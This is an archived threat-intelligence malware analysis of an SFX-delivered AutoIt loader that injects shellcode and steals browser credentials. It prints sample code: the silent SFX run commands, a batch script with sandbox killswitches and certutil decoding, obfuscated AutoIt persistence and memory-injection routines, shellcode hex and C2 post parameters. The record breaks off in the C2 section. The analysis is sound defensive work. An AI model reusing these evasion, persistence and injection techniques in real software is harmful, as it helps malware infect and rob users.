{
	"id": "4269a99a-cf46-47db-a76c-c9a3cc8eca3c",
	"created_at": "2026-04-06T00:07:55.322369Z",
	"updated_at": "2026-04-10T03:21:16.965037Z",
	"deleted_at": null,
	"sha1_hash": "0a1a3c85e85c093eda159ff17b7f40e6aee999a6",
	"title": "CyberThreatIntel/Additional Analysis/UnknownTA/2020-09-07/Analysis.md at master · StrangerealIntel/CyberThreatIntel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 970714,
	"plain_text": "CyberThreatIntel/Additional Analysis/UnknownTA/2020-09-\r\n07/Analysis.md at master · StrangerealIntel/CyberThreatIntel\r\nBy StrangerealIntel\r\nArchived: 2026-04-05 20:12:51 UTC\r\nTime to take the bull by the horns\r\nMalware analysis\r\nTTPs\r\nHunting\r\nCyber kill chain\r\nIndicators Of Compromise (IOC)\r\nReferences MITRE ATT\u0026CK Matrix\r\nLinks\r\nOriginal Tweet\r\nReferences\r\nMalware-analysis\r\nThe initial vector is a self-execute archive (SFX). This is built from a project of alternate module : 7z sfx\r\nModified Module (7zsfx).\r\nSFX module - Copyright (c) 2005-2016 Oleg Scherbakov\r\n1.7.0 develop [x86] build 3900 (April 1, 2016)\r\n7-Zip archiver - Copyright (c) 1999-2015 Igor Pavlov\r\n15.14 (December 31, 2015)\r\nThis launches a shell instance for extract the objects.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 1 of 31\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 2 of 31\n\nLike 7zip module, this uses an internal configuration for the actions to execute once the process extraction\r\nof the objects is done. This uses the hide methods for run as background and doesn't overwrite the files if\r\nalready exists.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 3 of 31\n\n;!@Install@!UTF-8!\r\n// control flag chains\r\nMiscFlags=\"1+2+16+64+128\"\r\n// 2 - hides the extraction dialog completely (silent mode)\r\nGUIMode=\"2\"\r\n// 1 - do not overwrite the existing files\r\nOverwriteMode=\"1\"\r\n// hidcon: -\u003e hide window to user\r\nRunProgram=\"hidcon:cmd /c echo SLsZudZK\"\r\nRunProgram=\"hidcon:cmd /c cmd \u003c sVqHm.com\"\r\n;!@InstallEnd@!Rar!\r\nOn the flags of Miscflags, we can see on the Russian archive of the project that can be chains for do a stack\r\nprocess of the actions for automation for the errors and check actions.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 4 of 31\n\nThis launches the main script for initiating the rest of the chain of actions.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 5 of 31\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 6 of 31\n\nThe first part of the script use a lot of kill switchs already detected in July 2020 on similliar autoit script.\r\naa_TouchMeNot is a reference of a file used on MSE sandbox for analysis threat in the sandbox, that\r\npresented in the first time on the blackhat 2018 and firstly used by BitPaymer ransomware.\r\nSet YAFtyhpbN=Q\r\nREM Check sandbox MSE\r\nif exist C:\\aaa_TouchMeNot_.txt exit\r\nREM Killswitch Computername\r\nif %computername% == DESKTOP-%YAFtyhpbN%UO5%YAFtyhpbN%U33 exit\r\nREM DESKTOP-QO5QU33\r\nping -n 1 UKL.UVLJR\r\nif %errorlevel% == 0 exit\r\nif %computername% == NfZtFbPfH exit\r\nif %computername% == ELICZ exit\r\nif %computername% == MAIN exit\r\nThe final part of the script fix the header of the autoit builder\r\n(23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928), write on the disk, decode from\r\nbase 64 the autoit payload to execute and launch with the autoit builder.\r\nREM Fix header on the autoit builder\r\n\u003cnul set /p =\"MZ\" \u003e SearchIndexer.com\r\nREM Echo and write the PE\r\ntype pZFFZxnbbPw.com \u003e\u003e SearchIndexer.com\r\nREM Remove the last script\r\ndel pZFFZxnbbPw.com\r\nREM Decode from base 64 the autoit payload to execute\r\ncertutil -decode sUs.com h\r\nREM Execute it\r\nSearchIndexer.com h\r\nping 127.0.0.1 -n 30\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 7 of 31\n\nAs obfuscation, the script uses a lot of while - switches loops for redirect the good section of code to push on\r\neach function. The first good thing to have in mind is to verify the functions that used in checking the\r\nnumbers of calls of references in theirs functions. Like forensic and malware analysis is a matter of instinct,\r\nthis a good idea, only four of twelve functions is used, the rest is junk code of makes high entropy and more\r\nharder the analysis. So only a third of more 16000 lines of the script is to deobfuscate, that a better start.\r\nIf (Ping(NuEIwMq(\"74I89I100I112I77I120I109I110I74I97I97I100I119I46I74I89I100I112I77I120I109I110I74I97\r\n \r\n$qGRwbSPeJ = @AppDataDir \u0026 NuEIwMq(\"94I101I113I119I117I110I94I101I113I119I117I110I48I101I113I111\",2)\r\n$ArlTLV = @AppDataDir \u0026 NuEIwMq(\"99I106I118I124I122I115I99I72I93I117I112I127I94I78\",7)\r\n$RvZgoJpth = @AppDataDir \u0026 NuEIwMq(\"98I105I117I123I121I114I98I123I88I116I124I77I124I123I72I124I80I107\r\n$aCYDDEjBZszBdg = @AppDataDir \u0026 NuEIwMq(\"101I108I120I126I124I117I101I90I79I111I82I77I127I82I89I125I93\r\nIf Not FileExists($qGRwbSPeJ) Then\r\nIf DirGetSize(@AppDataDir \u0026 NuEIwMq(\"96I103I115I121I119I112\",4)) \u003c 0 Then\r\nGlobal $JAYmBXZG = 118\r\nGlobal $hnwsOohw = 96\r\nWhile (6350-6349)\r\nSwitch $JAYmBXZG\r\nCase 115\r\n$dlffyVxJSrHGTz = SplashOff()\r\n$102 = 138\r\nWhile $RxnOkVaHWvSKlBaAlOllMJswgWDFYJifUGyFKAYzXDzShlpomD \u003e $102\r\n$dlffyVxJSrHGTz \u0026= ClipGet()\r\nWEnd\r\n$RhpdnNrMcyxjdGLYXChqJwlUuEKxGMMN = 5535\r\n$JAYmBXZG = $JAYmBXZG + 1\r\nCase 116\r\n$REJvBWHgZYXtFnk = IsAdmin()\r\n$88 = 86\r\nWhile $JuQegpUrJuJzHmfPQmuXDEoyDGiGNfwhBktUwSlHKGMxjgHmIigy \u003e $88\r\n$REJvBWHgZYXtFnk \u0026= Exp(279)\r\nWEnd\r\n$cccOYfnhXSNSgZHXFqVVhhZVdaCFvfsfQ = IsDllStruct(136518)\r\n$JAYmBXZG = $JAYmBXZG + 1\r\nCase 117\r\nOnce the switch conditions removed for getting the code, a second obfuscation is used in passing the strings\r\nto deobfuscate on NuEIwMq function. The algorithm is based on offset and the each integer value is\r\nconverted their corresponding ASCII value.\r\nFunc NuEIwMq($a, $b)\r\n $str = ''\r\n $tab = StringSplit($a, \"I\", 2)\r\n For $i = 0 To UBound($tab) - 1\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 8 of 31\n\n$str \u0026= Chrw($tab[$i] - $b)\r\n Next\r\nReturn $str\r\nEndFunc\r\nThis is split the string on array and use offset for getting the final string in reading all the array. The\r\nfollowing code on autoit can be easily converted in Powershell for decode the strings.\r\nfunction Decode\r\n{\r\n param (\r\n [string]$a,\r\n [int]$b\r\n )\r\n $str = ''\r\n $tab= $a.Split(\"I\")\r\n for ($i = 0; $i -lt $tab.Count; $i++) { $str += [char][int]($tab[$i] - $b) }\r\n return $str\r\n}\r\n\u003e Decode \"94I101I113I119I117I110I94I101I113I119I117I110I48I101I113I111\" 2\r\n\\cousl\\cousl.com\r\nAs first action the script check if this on the sandbox on using well-known method based on the difference\r\nbetween real time and time pass on the sandbox by GetTickCount method.\r\nOpt(\"TrayIconHide\", 1)\r\nFunc Antisandbox_by_diff_time($val)\r\n$time1 = DllCall (\"kernel32.dll\", \"long\", \"GetTickCount\")\r\n$uFQgPxoxA = DllCall(\"kernel32.dll\", \"DWORD\", \"Sleep\", \"dword\", $val)\r\n$time2 = DllCall (\"kernel32.dll\", \"long\", \"GetTickCount\")\r\n$dif_time = $time2[0] - $time1[0]\r\nIf Not (($dif_time+500)\u003e=$val and ($dif_time-500)\u003c=$val) Then\r\nExit\r\nEndIf\r\nEndFunc\r\nA second wave of anti-analysis measures is performed in reusing the MSE sandbox flag killswitch domain\r\nand various names of computernames.\r\nIf (FileExists(\"C:\\aaa_TouchMeNot.txt\" Or @ComputerName = \"NfZtFbPfH\" Or @ComputerName = \"tz\" Or @Com\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 9 of 31\n\nBy hunting, we can note that the autoit payload have sill the same computernames and check the MSE flag\r\nbut use differents delimiter for the obfuscated method. The structures are the same and are based on useless\r\nfunctions for the previous reasons.\r\nDate Delimiter Computernames Check MSE flag ?\r\n2020-09-03 I NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-09-02 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-08-31 . NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-08-01 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-31 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-27 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-27 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-22 ± NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-17 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-16 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-15 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-15 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-14 . NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-13 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-09 * NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\nThe next following block of code allocates the semaphore, creates the shortcuts, prepares the files and paths\r\nand run the final payload in memory in pushing the anti-sandbox measures for protect the to launch it on\r\nanalysis environment.\r\n$Jvar = DllCall(DllOpen(\"kernel32.dll\"), \"handle\", \"CreateSemaphoreA\", \"ptr\", Null, \"long\", 1, \"long\r\n$CodeError = DllCall(\"kernel32.dll\", \"long\", \"GetLastError\")[0]\r\nIf $CodeError == 183 Then\r\n$Pfile = FileOpen(@ScriptDir \u0026 '\\' \u0026 'QFfIDvIPtTOu.com',16)\r\n$RData = FileRead($Pfile)\r\nIf (Ping(\"JYdpMxmnJaadw.JYdpMxmnJaadw\", 1000) \u003c\u003e 0) Then Exit\r\n$PathDomain = @AppDataDir \u0026 \"\\cousl\\cousl.com\"\r\n$PathAutoitScript = @AppDataDir \u0026 \"\\cousl\\AVnixWG\"\r\n$PathVBSFile = @AppDataDir \u0026 \"\\cousl\\uRnvGvuBvJe.vbs\"\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 10 of 31\n\n$PathBinaryData = @AppDataDir \u0026 \"\\cousl\\QFfIDvIPtTOu.com\"\r\nIf Not FileExists($PathDomain) Then\r\nIf DirGetSize(@AppDataDir \u0026 \"\\cousl\") \u003c 0 Then\r\nDirCreate(@AppDataDir \u0026 \"\\cousl\")\r\nEndIf\r\nFileWrite(FileOpen($PathAutoitScript,2), FileRead(@ScriptFullPath))\r\nFileDelete(@ScriptFullPath)\r\nFileWrite(FileOpen($PathDomain,2), FileRead(FileOpen(@AutoItExe,16)))\r\nFileWrite(FileOpen($PathBinaryData,2), FileRead(FileOpen(\"SHhKFxKRvVQw0eqo\"),16)))\r\nFileDelete(\"SHhKFxKRvVQw0eqo\"))\r\nFileWrite(FileOpen($PathVBSFile,2), \"pUCkyGzHUI = GetObject(\" \u0026 ChrW(34) \u0026 \"winmgmts:\\\\.\\root\r\nFileSetAttrib(@AppDataDir \u0026 \"\\cousl\", \"+SH\", 1)\r\nIf Not FileExists(@StartupDir \u0026 \"\\cousl.url\") Then\r\nFileWrite(FileOpen(@StartupDir \u0026 \"\\cousl.url\",34), \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"UR\r\nElse\r\nFileDelete(@StartupDir \u0026 \"\\cousl.url\")\r\nFileWrite(FileOpen(@StartupDir \u0026 \"\\cousl.url\",34), \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"UR\r\nEndIf\r\nEndIf\r\n$time2Num = 0\r\nAntisandbox_by_diff_time(8391)\r\nFor $j = 0 To 29984739\r\n$time2Num = $time2Num + 1\r\nNext\r\nIf Not ($time2Num == 29984740) Then Exit\r\n$Path_PE = @SystemDir \u0026 \"\\\" \u0026 \"nslookup.exe\"\r\nGlobal $Jvar = AllocatePayload(Init_Struct(Binary($RData), Binary(\"7914561\")), $ArgCmdline, $Path_PE\r\nWinWaitClose(1)\r\nElse\r\nRun(@AutoItExe \u0026 \" \" \u0026 $CmdLineRaw)\r\nAntisandbox_by_diff_time(500)\r\nThe two next functions are for initiate the process and the structure which content the payload. In function\r\nof the OS arch, this push the following header of structure of the process to initiate.\r\nFunc Init_Struct($arg1, $arg2)\r\nIf @AutoItX64 Then\r\nLocal $OP_DLL_Struct = \"0x89C055 [...] EC54963F241\"\r\n$OP_DLL_Struct \u0026= \"83C201EBC448 [...] 5EC3\"\r\nElse\r\nLocal $OP_DLL_Struct = \"0x89C05531C057565383E [...] 583C4085B5E5F5DC2100089\"\r\n$OP_DLL_Struct \u0026= \"DB5557565383EC088B54 [...] 21000\"\r\nEndIf\r\nLocal $Ref_Struct_1 = (StringInStr($OP_DLL_Struct, \"89C0\") - 3) / 2\r\nLocal $Ref_Struct_2 = (StringInStr($OP_DLL_Struct, \"89DB\") - 3) / 2\r\n$OP_DLL_Struct = Binary($OP_DLL_Struct)\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 11 of 31\n\n$struct1 = DllStructCreate(\"byte[\" \u0026 BinaryLen($OP_DLL_Struct) \u0026 \"]\", DllCall(\"kernel\r\nDllStructSetData($struct1, 1, $OP_DLL_Struct)\r\nLocal $lim = BinaryLen($arg2)\r\nLocal $Bytes_Struct = DllStructCreate(\"byte[\" \u0026 $lim \u0026 \"]\")\r\nDllStructSetData($Bytes_Struct, 1, $arg2)\r\nLocal $ctvBJcdIjHzL = DllStructCreate(\"byte[272]\")\r\n@AutoItX64 ? DllCallAddress(\"none\", DllStructGetPtr($struct1) + $Ref_Struct_1, \"ptr\"\r\nLocal $lim2 = BinaryLen($arg1)\r\nLocal $Bytes_Struct2 = DllStructCreate(\"byte[\" \u0026 $lim2 \u0026 \"]\")\r\nDllStructSetData($Bytes_Struct2, 1, $arg1)\r\n@AutoItX64 ? DllCallAddress(\"int\", DllStructGetPtr($struct1) + $Ref_Struct_2,\"ptr\", D\r\nReturn Init_process($Bytes_Struct2, 1)\r\nEndFunc\r\nFunc Init_process($Ref_Struct, $Ref_Element, $control = 0 )\r\nIf NOT $control = 0 Then\r\nreturn DllStructGetData($Ref_Struct, $Ref_Element, $control)\r\nelse\r\nreturn DllStructGetData($Ref_Struct, $Ref_Element)\r\nEndIF\r\nEndFunc\r\nThe last function called is for the allocation of the payload in memory in creating the structure need for run\r\nit. The Actor use StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) as obfuscation for the end of the\r\npayload, this chooses a random letter between A to Z but rest the same due to this convert to binary format\r\n(01000001 - 01011010) and kept only the first two numbers at left that return each time \"01\". This can be\r\nreplacing by this value (\"01\") for getting all the shellcode that need to run.\r\nFunc AllocatePayload($a, $SJKRKKK = \"\", $cOVkTS = \"\")\r\n$Payload = \"0xE9971E000 [...] 45F48A00\"\r\n[...]\r\n$Payload \u0026= \"300400008DB424B001000050F3A5E8F8E2FFFF6A5E596A\" \u0026 StringTrimLeft(Binary(Chr(Rand\r\n$Payload \u0026= \"3CF3A56689442410586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689\r\n$Payload \u0026= \"586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442418586A\" \u0026 St\r\n$Payload \u0026= \"586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442420586A\" \u0026 St\r\n$Payload \u0026= \"6689442428586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"668944242A\r\n$Payload \u0026= \"6689442430586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442432\r\n$Payload \u0026= \"33C066894424368D4 [...] 750C8D84\"\r\n$Payload \u0026= \"242C0300008DB424B40 [...] 0000000\"\r\n$Payload \u0026= \"0000000000000000000000000000000000000000000000000000000000000000\"\r\n$Bin_Payload = Binary($Payload)\r\n$Bin_Data = Binary($a)\r\n$lim_Payload = BinaryLen($Bin_Payload)\r\n$initAlloc = DllCall(\"kernel32.dll\", \"ptr\", \"VirtualAlloc\", \"ptr\", 0, \"ulong_ptr\", $lim_Paylo\r\n$struc = DllStructCreate(\"byte file[\" \u0026 BinaryLen($Bin_Data) \u0026 \"]\")\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 12 of 31\n\nDllStructSetData(DllStructCreate(\"byte nop[\" \u0026 $lim_Payload \u0026 \"]\", $initAlloc), \"nop\", $Bin_P\r\nDllStructSetData($struc, \"file\", $Bin_Data)\r\n$address = DllCallAddress(\"dword\", $initAlloc, \"str\", $cOVkTS, \"ptr\", DllStructGetPtr($struc\r\nReturn WinGetProcess($address)\r\nEndFunc\r\nThe shellcode extracted can be easily push in Radare2 by a malloc or in Cutter (GUI of Radare2) on the\r\nshellcode panel.\r\n$ r2 malloc://1\r\n[0x00000000]\u003e wx E9971E0000558BECB84D5A000083EC14663903740433C0EB7F8B433C813C185045000075 [...]\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 13 of 31\n\nAs first action, this load the strings on stack strings on the memory. In unstacking the strings, we can get a\r\nfirst look on the actions that perform the shellcode. The attacker uses NtQuerySystemInformation for\r\ngetting a list of all handles open on the system for perform KnownDlls Cache Poisoning. In comparing the\r\nreference with \\KnownDlls\\X, this gets the HandleValue is returned by the call. This allows of to perform an\r\ninjection on the process to target.\r\n0x000001fb mov word [rbp - 0x320], 0x57 ; 'FindResourceW'\r\n0x00000222 mov byte [rbp - 0x218], al ; 'LoadResource'\r\n0x0000024f mov byte [rbp - 0x33e], al ; 'SizeofResource'\r\n0x00000273 mov byte [rbp - 0x270], al ; 'LockResource'\r\n0x000002b5 mov byte [rbp - 0x670], al ; 'NtQuerySystemInformation'\r\n0x000002ed mov dword [rbp - 0x658], 0x79726f ; 'NtAllocateVirtualMem'ory'\r\n0x00000315 mov word [rbp - 0x2d0], 0x73 ; 'NtOpenProcess'\r\n0x0000035a mov word [rbp - 0x6c4], 0x73 ; 'NtQueryInformationProcess'\r\n0x00000381 mov word [rbp - 0x2f0], 0x6f ; 'GetSystemInfo'\r\n0x00000398 mov byte [rbp - 0x2c], al ; 'mbstowcs'\r\n0x000003a8 mov byte [rbp - 0x22], al ; 'strlen'\r\n0x000003e6 mov byte [rbp - 0x19e], al ; '\\KnownDlls32\\ntdll.dll'\r\n0x00000428 mov word [rbp - 0x238], 0x6c ; '\\KnownDlls32\\advapi32.dll'\r\n0x0000046d mov word [rbp - 0x254], 0x6c ; '\\KnownDlls32\\kernel32.dll'\r\n0x000004a8 mov dword [rbp - 0x1dc], 0x6c6c64 ; '\\KnownDlls32\\user32.dll'\r\n0x000004e4 mov byte [rbp - 0x110], al ; '\\KnownDlls\\ntdll.dll'\r\n0x0000051c mov dword [rbp - 0x200], 0x6c6c64 ; '\\KnownDlls\\advapi32.dll'\r\n0x00000558 mov dword [rbp - 0x1c4], 0x6c6c64 ; '\\KnownDlls\\kernel32.dll'\r\n0x00000594 mov word [rbp - fcn.00000164], 0x6c ; '\\KnownDlls\\user32.dll'\r\n0x000005cf mov byte [rbp - 0xf8], al ; '\\KnownDlls\\Ole32.dll'\r\n0x000005e9 mov byte [rbp - 0x16], al ; 'user32.dll'\r\n0x000005ec mov dword [rbp - 0xf4], 0x704f744e ; 'NtOpenKey'\r\n0x00000627 mov dword [rbp - 0x410], 0x79654b ; 'NtQueryValueKey'\r\n0x00000658 mov byte [rbp - 0x39e], al ; 'NtEnumerateKey'\r\n0x0000066b mov byte [rbp - 0x76], al ; 'memcpy'\r\n0x000006a0 mov byte [rbp - 0x5c8], al ; 'CryptAcquireContextW'\r\n0x000006a6 mov dword [rbp - 0x42c], 0x70797243 ; 'CryptCreateHash'\r\n0x000006ce mov dword [rbp - 0x30c], 0x70797243 ; 'CryptHashData'\r\n0x0000071c mov byte [rbp - 0x35e], al ; 'CryptDeriveKey'\r\n0x00000722 mov dword [rbp - 0x478], 0x70797243\r\n0x0000074a mov byte [rbp - 0x468], al ; 'CryptDestroyHash'\r\n0x00000750 mov dword [rbp - 0x2ac], 0x70797243\r\n0x0000076e mov byte [rbp - 0x2a0], al ; 'CryptDecrypt'\r\n0x00000774 mov dword [rbp - 0x3ec], 0x70797243 ; 'CryptDestroyKey'\r\n0x000007c4 mov dword [rbp - 0x56c], 0x747865 ; 'CryptReleaseContext'\r\n0x000007f6 mov dword [rbp - 0x558], 0x79726f ; 'NtReadVirtualMemory'\r\n0x00000815 mov byte [var_48h], al ; 'LoadLibraryA'\r\n0x0000083f mov byte [rbp - 0x96], al ; 'GetProcAddress'\r\n0x0000085a mov byte [rbp - 8], al ; 'advapi32.dll'\r\n0x00000871 mov byte [rbp - 0xc8], al ; 'lstrlenW'\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 14 of 31\n\n0x000008b2 mov byte [rbp - 0x626], al ; 'NtProtectVirtualMemory'\r\n0x000008d6 mov byte [rbp - 0x228], al ; 'FreeResource'\r\n0x00000903 mov byte [rbp - 0x36e], al ; 'CreateProcessW'\r\n0x00000927 mov word [rbp - 0x2e0], 0x79 ; 'RtlZeroMemory'\r\n0x00000961 mov byte [rbp - 0x4b6], al ; 'NtTerminateProcess'\r\n0x00000999 mov byte [rbp - 0x5b0], al; 'NtWriteVirtualMemory'\r\n0x000009d1 mov byte [rbp - 0x598], al ; 'ZwUnmapViewOfSection'\r\n0x000009fe mov byte [rbp - 0x37e], al ; 'NtResumeThread'\r\n0x00000a35 mov byte [rbp - 0x4ca], al ; 'NtSetContextThread'\r\n0x00000a6c mov byte [rbp - 0x4f2], al ; 'NtGetContextThread'\r\n0x00000aa3 mov byte [rbp - 0x48e], al ; 'NtMapViewOfSection'\r\n0x00000ad1 mov dword [rbp - 0x6c0], 0x61707845 ; 'NtCreateSection'\r\n0x00000b0d mov word [rbp - 0x6a8], 0x57 ; 'ExpandEnvironmentStringsW'\r\n0x00000b47 mov byte [rbp - 0x4de], al ; 'GetModuleFileNameA'\r\n0x00000b88 mov byte [rbp - 0x60e], al ; 'NtQueryInformationFile'\r\n0x00000bab mov byte [rbp - 0x156], al ; 'NtReadFile'\r\n0x00000bce mov byte [rbp - 0x126], al ; 'NtOpenFile'\r\n0x00000bf2 mov word [rbp - 0x2c0], 0x79 ; 'NtSetValueKey'\r\n0x00000c19 mov byte [rbp - 0x290], al ; 'NtCreateFile'\r\n0x00000c33 mov dword [rbp - 0x1f4], 0x656c69 ; 'NtWriteFile'\r\n0x00000c79 mov dword [rbp - 0x6fc], 0x687461 ; 'RtlFormatCurrentUserKeyPath'\r\n0x00000c90 mov byte [rbp - 0x6e], al ; 'wcscat'\r\n0x00000ca3 mov byte [rbp - 0x7e], al ; 'memset'\r\n0x00000cce mov byte [rbp - 0x440], al ; 'NtDelayExecution'\r\n0x00000ce7 mov byte [rbp - 0x8e], al ; 'wcslen'\r\n0x00000d15 mov byte [rbp - 0x454], al ; 'NtCreateThreadEx'\r\n0x00000d38 mov byte [rbp - 0x17a], al ; 'NtContinue'\r\n0x00000d66 mov dword [rbp - 0x544], 0x646165 ; 'RtlCreateUserThread'\r\n0x00000da1 mov byte [rbp - 0x4a2], al ; 'NtOpenProcessToken'\r\n0x00000dd9 mov dword [rbp - 0x640], 0x6e656b ; 'NtAdjustPrivilegesToken'\r\n0x00000e28 mov byte [rbp - 0x6de], al ; 'RtlCreateProcessParameters'\r\n0x00000e60 mov byte [rbp - 0x580], al ; 'RtlCreateUserProcess'\r\n0x00000e66 mov dword [rbp - 0x52c], 0x7243775a\r\n0x00000e8e mov dword [rbp - 0x51c], 0x6e6f69 ; 'ZwCreateTransaction'\r\n0x00000eb6 mov word [rbp - 0x310], 0x6e ; 'NtOpenSection'\r\n0x00000efb mov byte [rbp - 0x68c], al ; 'RtlSetCurrentTransaction'\r\n0x00000f33 mov word [rbp - 0x5e0], 0x6e ; 'ZwRollbackTransaction'\r\n0x00000f77 mov byte [rbp - 0x5f6], al ; 'LdrGetProcedureAddress'\r\n0x00000f9a mov byte [rbp - 0x14a], al ; 'LdrLoadDll'\r\n0x00000fb3 mov byte [rbp - 0x86], al ; 'wcscmp'\r\n0x00000fcd mov dword [rbp - 0x1b8], 0x41786f ; 'MessageBoxA'\r\n0x00000ffe mov byte [rbp - 0x34e], al ; 'IsWow64Process'\r\n0x0000102c mov dword [rbp - 0x530], 0x79726f ; 'NtFreeVirtualMemory'\r\n0x00001040 mov dword [rbp - 0xa8], 0x65736f ; 'NtClose'\r\n0x00001057 mov byte [rbp - 0x66], al ; 'wcscpy'\r\n0x00001082 mov dword [rbp - 0x508], 0x737365 ; 'NtCreateUserProcess'\r\n0x000010a0 mov byte [rbp - 0xb0], al ; 'wcstombs'\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 15 of 31\n\n0x000010cd mov byte [rbp - 0x32e], al ; 'NtQuerySection'\r\n0x000010f0 mov byte [rbp - 0x13e], al ; 'ShowWindow'\r\n0x00001114 mov dword [rbp - 0x430], 0x577845 ; 'CreateWindowExW'\r\n0x00001145 mov byte [rbp - 0x38e], al ; 'RegisterClassW'\r\n0x00001172 mov byte [rbp - 0x3ae], al ; 'DefWindowProcW'\r\n0x00001178 mov dword [rbp - 0x40c], 0x74736f50 ; 'Post'\r\n0x00001182 mov dword [rbp - 0x408], 0x74697551 ; 'Quit'\r\n0x00001196 mov dword [rbp - 0x400], 0x656761 ; 'Message'\r\n0x000011b4 mov byte [rbp - 0xd4], al ; 'EndPaint'\r\n0x000011ce mov byte [rbp - 0xbc], al ; 'FillRect'\r\n0x000011f1 mov byte [rbp - 0x132], al ; 'BeginPaint'\r\n0x0000121e mov byte [rbp - 0x3ce], al ; 'CoInitializeEx'\r\n0x0000124c mov byte [rbp - 0x47c], al ; 'CoCreateInstance'\r\n0x000012d7 mov byte [rbp - 0x3be], al ; 'NtCreateMutant'\r\n0x000012fb mov byte [rbp - 0x2b0], al ; 'NtOpenMutant'\r\n0x00001360 mov dword [rbp - 0x284], 0x57786574 ; 'CreateMutexW'\r\nBy the way, this rebuilds the sections and the dll to inject on the process.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 16 of 31\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 17 of 31\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 18 of 31\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 19 of 31\n\nOn dynamic analysis, we can see the actions for streal the credentials in downloading and executing the\r\nsame sqlite3 package (76ec7536ebeaa661263f677f89222bb5ac68c16087d3e99a66cba6419d34b57f) that has\r\nused by some samples since last month. This pushes the data extracted with the sqlite3.dll to the\r\ncorresponding file and compact it on a zip in memory.\r\nUnfortunately, the C2 don't respond but the agent sends the informations and the role of some parameters\r\ncan be assigned.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 20 of 31\n\n// first post :\r\np1=90059c37-1320-41a4-b58d-816d-806e6f6e6976\u0026p2=55534552\u0026p3=61646D696E\u0026p4=57696E646F7773203720536572766963652050\r\n // Second post :\r\n 